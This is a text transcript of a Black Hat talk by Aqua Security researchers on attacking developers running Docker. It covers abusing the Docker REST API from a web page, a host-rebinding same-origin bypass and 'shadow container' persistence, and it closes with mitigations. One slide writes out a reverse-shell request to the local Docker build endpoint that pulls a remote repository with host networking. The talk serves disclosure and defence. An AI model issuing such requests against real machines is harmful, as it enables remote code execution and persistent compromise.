Download as PDF, PPTX
Uploaded byAqua Security
How abusing the Docker API led to remote code execution same origin bypass and persistence
The document discusses how vulnerabilities in the Docker API can lead to remote code execution, particularly targeting developers due to their high access privileges and low security awareness. It details attack methods like host rebinding and the use of shadow containers to persist and conceal malicious activities. The authors emphasize the need for improved security measures for container engines and propose mitigation strategies to safeguard development environments.
More Related Content
Similar to How abusing the Docker API led to remote code execution same origin bypass and persistence
How abusing the Docker API led to remote code execution same origin bypass and persistence
- 1. Well, That EscalatedQuickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor via Shadow Containers. Michael Cherny @chernymi Sagie Dulce @SagieSec
- 2. 2 WHO ARE WE? MichaelCherny Head of Research Aqua Security @chernymi Sagie Dulce Sr Security Researcher Aqua Security @SagieSec
- 3. 3 FOCUS Developers arethe new Targets
- 4. 4 FOCUS Developers arethe new Targets Main Course: APT Developer Running Docker
- 5. 5 FOCUS Developers arethe new Targets Main Course: APT Developer Running Docker New Attacks: Host Rebinding & Shadow Container
- 6. 6 MENU Containers &Container Development Attacking Developers Abusing Docker API Host Rebinding Attack Shadow Containers Full Attack -> Click 2 PWN Conclusions ① ② ③
- 7.
- 8. 8 VIRTUAL MACHINES VSCONTAINERS www.serverspace.co.uk/blog/containerisation-vs-virtualisation-whats-the-difference
- 9. 9 CONTAINERS EVERYWHERE LinuxContainers Linux / Windows / Mac Windows Containers Native / Hyper-V (Windows Server) Hyper-V (windows 10)
- 10.
- 11. 11 DEVELOPERS AS TARGETS High privileges on their machines & domain Low security attention High Confidence Access to sensitive data Code IP Registries
- 12.
- 13.
- 14. ATTACK OVERVIEW ATTACKING CONTAINERDEVELOPERS
- 15.
- 16.
- 17. 17 ATTACK OVERVIEW –WINDOWS 10 Abuse Docker API Host Rebinding Shadow Container Remote Code Execution Privilege Escalation Persistency ① ② ③
- 18. ABUSING DOCKER API FROMA MALICIOUS WEB PAGE ①
- 19. 19 DOCKER 4 WINDOWS/ MAC Client talks to daemon over via REST API UNIX socket named pipe ..or TCP port TCP port was default on Windows 10
- 20. 20 DOCKER 4 WINDOWS/ MAC Client talks to daemon over via REST API UNIX socket named pipe ..or TCP port TCP port was default on Windows 10 Abuse Remotely?
- 21. 21 DOCKER REST API– CAN WE ATTACK IT? It’s complicated Same Origin Policy?!
- 22. 22 BROWSER SECURITY Browsersneed to display content from multiple domains But, one domain shouldn’t be able to read / write to another Post status in Facebook Collect underpants... etc.
- 23. 23 SAME ORIGIN POLICY(SOP) Only “simple” requests are allowed across origins GET – can’t read response body POST – can’t send with a body / not all header types HEAD Not same origin: request has different domain, protocol or port
- 24. 24 DOCKER API CALLSTHAT DON’T VIOLATE SOP List containers (GET) Inspect container (GET) List processes in container (GET) Get container logs (GET) Get container’s changes in filesystem (GET) Export container (GET) Get container stats (GET) Resize Container (POST) Start Container (POST) List images (GET) Build image (POST) Create image (POST) Get image history (GET) Push image (POST) Stop Container (POST) Restart container (POST) Kill a container (POST) Rename container (POST) Pause container (POST) Unpause container (POST) Attach to a container (POST) Get file info in a container (HEAD) Get filesystem archive (GET) Delete Container (POST) List networks (GET) Inspect Network (GET) Tag image (POST) List volumes (GET) Export image (GET) Inspect volume (GET) List secrets (GET) Create secret (POST) Inspect secret (GET) Inspect Swarm (GET) List nodes (GET) Inspect node (GET) List services (GET) Inspect service (GET) Get service logs (GET) List tasks (GET) Inspect a task (GET) Search image (GET) Delete image (DELETE) https://docs.docker.com/engine/api/v1.29/
- 25. 25 DOCKER API CALLSTHAT DON’T VIOLATE SOP List containers (GET) Inspect container (GET) List processes in container (GET) Get container logs (GET) Get container’s changes in filesystem (GET) Export container (GET) Get container stats (GET) Resize Container (POST) Start Container (POST) List images (GET) Build image (POST) Create image (POST) Get image history (GET) Push image (POST) Stop Container (POST) Restart container (POST) Kill a container (POST) Rename container (POST) Pause container (POST) Unpause container (POST) Attach to a container (POST) Get file info in a container (HEAD) Get filesystem archive (GET) Delete Container (POST) List networks (GET) Inspect Network (GET) Tag image (POST) List volumes (GET) Export image (GET) Inspect volume (GET) List secrets (GET) Create secret (POST) Inspect secret (GET) Inspect Swarm (GET) List nodes (GET) Inspect node (GET) List services (GET) Inspect service (GET) Get service logs (GET) List tasks (GET) Inspect a task (GET) Search image (GET) Delete image (DELETE) https://docs.docker.com/engine/api/v1.29/
- 26. 26 BUILD IMAGE Buildimages from Dockerfile FROM alpine:latest ADD mycode.sh RUN apt-get update && apt-get install –y … RUN ./mycode.sh
- 27. 27 BUILD IMAGE Buildimages from Dockerfile … Build == Execute code! FROM alpine:latest ADD mycode.sh RUN apt-get update && apt-get install –y … RUN ./mycode.sh Execute Yourself
- 28. 28 BUILD IMAGE APICALL POST /build No body => no SOP violation! Interesting build parameters
- 29. 29 BUILD IMAGE APICALL POST /build No body => no SOP violation! Interesting build parameters t (tag)
- 30. 30 BUILD IMAGE APICALL POST /build No body => no SOP violation! Interesting build parameters t (tag) remote git repository!
- 31. 31 BUILD IMAGE APICALL POST /build No body => no SOP violation! Interesting build parameters t (tag) remote git repository! networkmode (bridge / host / none)
- 32. 32 BUILD IMAGE APICALL REVERSE SHELL DEMO POST http://localhost:2375/build? remote=https://github.com/<User>/<Repo> &networkmode=host
- 33. 33 BUILD IMAGE APICALL REVERSE SHELL DEMO
- 34.
- 35.
- 36.
- 37.
- 38.
- 39.
- 40.
- 41. 41 DOCKER FIX Wedisclosed to Docker TCP now an “opt-in”
- 42. HOST REBINDING ATTACK DAEMONPRIVILEGE ESCALATION ②
- 43.
- 44.
- 45.
- 46.
- 47. 47 DNS REBINDING -HISTORY Carbon Dated to ~1996 2007 Protecting Browsers from DNS Rebinding Attacks 2008 Defending your DNS in a post-Kaminsky world 2010 How to Hack Millions of Routers
- 48. 48 DNS REBINDING –HOW IT WORKS
- 49. 49 DNS REBINDING –HOW IT WORKS
- 50. 50 DNS REBINDING –HOW IT WORKS
- 51. 51 DNS REBINDING –HOW IT WORKS
- 52. 52 DNS REBINDING –HOW IT WORKS
- 53. 53 DNS REBINDING –HOW IT WORKS
- 54. 54 DNS REBINDING –HOW IT WORKS SOP BYPASSED!
- 55. 55 WHY NOT USEDNS REBINDING? DNS Rebinding may fail Existing protections (perimeter) Attacker needs to setup domain $$$ Maintenance IP Reputation & Threat Intelligence
- 56. 56 LLMNR: DNS OVERTHE LAN Name resolution over the LAN LLMNR DNS like resolution IPv4 & IPv6
- 57. 57 ATTACKING LLMNR Requestsbroadcasted over virtual interface! Spoof LLMNR Replies Cached in the browser (IE / Chrome / FF) for ~60 seconds Skip cache in FF Delay HTTP response 0.5 sec https://tools.ietf.org/html/rfc4795#section-2.2
- 58.
- 59.
- 60.
- 61.
- 62.
- 63.
- 64.
- 65.
- 66.
- 67. 67 HOST REBINDING DEMO SOPBYPASSED!
- 68. 68 HOST REBINDING DEMO SOPBYPASSED!
- 69. 69 HOST REBINDING DEMO SOPBYPASSED!
- 70.
- 71. 71 RECAP Full API Access:docker run …? Abuse Docker API Host Rebinding Remote Code Execution Privilege Escalation ① ②
- 72. SHADOW CONTAINER PERSISTENCE &CONCEALMENT ③
- 73. 73 MISSING PERSISTENCE &CONCEALMENT So Far… Privileged container on the VM (Moby Linux) Access to VM filesystem Access to enterprise internal network But… Not Concealed: docker ps Not Persistent: VM boots from image
- 74.
- 75.
- 76.
- 77.
- 78. 78 SHADOW CONTAINER –SHUTDOWN SCRIPT
- 79. 79 SHADOW CONTAINER –MYSCRIPT.SH
- 80.
- 81.
- 82.
- 83.
- 84. 84 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding
- 85. 85 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding
- 86. 86 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding
- 87. 87 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container
- 88. 88 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container
- 89. 89 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container
- 90. 90 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container
- 91. 91 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container shadow
- 92. 92 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container shadow
- 93. 93 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container
- 94. 94 FULL ATTACK DEMO Abuse DockerAPI Host Rebinding Shadow Container myscript
- 95.
- 96.
- 97. 97 ADVANCED PERSISTENT THREAT Persistency Concealment Low Forensic Footprint Access to Internal Enterprise Network
- 98. 98 SHADOW WORM Attackerpoisons images Bad image spread like a worm in pipeline
- 99. 99 ATTACK FLAVORS MAC • DNS Rebinding •Shadow Container Linux • DNS Rebinding • Full Access Windows Containers • Abuse API • Host Rebinding • Full Access
- 100.
- 101. 101 MITIGATION Don’t exposecontainer engine API Only allow authenticated clients (certificates) access to exposed port (or block it via Firewall) Analyze Container Engine Logs (on development also) Disable NetBIOS & LLMNR Continuously scan images in registries Continuously monitor containers in runtime
- 102. 102 BLACK HAT SOUNDBYTES Developers are the new Targets New Attacks: Host Rebinding & Shadow Container Protect your PIPE: Scan images & Monitor Containers in Runtime Michael Cherny @chernymi Sagie Dulce @SagieSec http://info.aquasec.com/whitepaper-how-abusing-docker-api-led-to-remote-code-execution